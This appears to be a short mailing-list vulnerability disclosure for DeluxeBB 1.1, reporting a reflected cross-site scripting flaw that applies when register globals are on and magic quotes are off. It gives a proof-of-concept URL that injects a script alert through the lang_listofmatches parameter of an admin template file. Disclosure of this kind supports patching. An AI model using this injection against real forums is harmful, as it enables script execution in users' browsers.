<<< Date Index >>>     <<< Thread Index >>>

DeluxeBB 1.1 XSS Vulnerabilitie



########################################################
#Founded: 21, January 2008                             
#Autor: NBBN                                           
#Type: XSS                                             
#DeluxeBB Version: 1.1                                 
#Register Globals: ON                                  
#Magic Quotes; OFF                                     
########################################################

poc:

http://www.site.tld/path/templates/default/admincp/attachments_header.php?lang_listofmatches=<script>alert("XSS")</script>